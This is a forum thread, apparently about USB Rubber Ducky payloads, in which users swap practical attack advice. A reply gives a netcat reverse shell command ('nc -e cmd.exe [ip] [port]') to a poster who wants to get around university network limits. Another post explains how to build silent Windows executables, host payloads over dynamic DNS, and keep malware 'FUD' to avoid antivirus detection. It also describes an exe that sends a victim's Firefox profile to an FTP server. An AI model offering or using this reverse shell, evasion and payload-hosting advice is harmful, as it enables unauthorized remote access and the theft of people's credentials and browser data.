Neglected Posted February 19, 2013 Share Posted February 19, 2013 Can anyone recommend some decent exe's to execute with the wget payload? I'm confused what the command is really for. Will it just get you the exe and you install the program from there. Or are you trying to call on an exe that you just have to run once for it to stay on the computer. Also I was curious as to whether or not the payloads are reversible. Say I did DNS poisoning to a machine, would I be able to set the DNS settings back if I wanted to? Thanks again for any help. Quote Link to comment Share on other sites More sharing options...
webdirector Posted February 19, 2013 Share Posted February 19, 2013 well if you want to make it easy just go grab what you need from www.nirsoft.net . Most of them you do not need to install you just run them. hope this helps Quote Link to comment Share on other sites More sharing options...
no42 Posted February 19, 2013 Share Posted February 19, 2013 Also I was curious as to whether or not the payloads are reversible. Say I did DNS poisoning to a machine, would I be able to set the DNS settings back if I wanted to? The payloads are made from your ducky script instructions, if you want a reverse one, you must code it yourself! Quote Link to comment Share on other sites More sharing options...
Neglected Posted February 19, 2013 Author Share Posted February 19, 2013 Much appreciated guys, so there is no way to reverse a script without coding it yourself. I almost feel each payload should come with its reverse payload, but that's not a concern that necessarily affects me yet. Could anyone give me an idea on how to install a reverse shell using netcat? I'm on a university network, so is there anyway around this? Quote Link to comment Share on other sites More sharing options...
no42 Posted February 19, 2013 Share Posted February 19, 2013 netcat reverse shell (provided your using TwinDuck firmware): $ %myd%\nc -e cmd.exe [ip] [port] Quote Link to comment Share on other sites More sharing options...
ApacheTech Consultancy Posted February 19, 2013 Share Posted February 19, 2013 Most of the wget executables I use I've used,I've coded myself in Visual Studio. Make a Windows Forms application and delete the form and the contents of Main in Program.cs and code it as if it was a Console Application. It makes the program totally silent. The other way to go would be to use AutoIT, it comes with a huge range of community built scripts that make creating an exploit pretty easy. If you don't have a background in programming, there are multitudes of sites that have pre-built software you can use. Try SecurityXploded or IronGeek. As for hosting, I've simply installed XAMPP on my PC and connect via a DtDNS host. It means I can store the executables on my own PC to create a repository of files that might otherwise have a free hosted account online shut down. Try to keep any executables FUD, but a word of warning... VirusTotal.com actually run any executables that go through as undetected, unsandoxed. I made a sidejacking exe that uploads the victim's Firefox Profile to my FTP site and it was undetected on Virus Total. Five minutes later, my FTP was filling up with files. I deleted the files straight away and changed the password for the FTP account so it wouldn't happen again, but anything more malicious could have had more serious repercussions. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.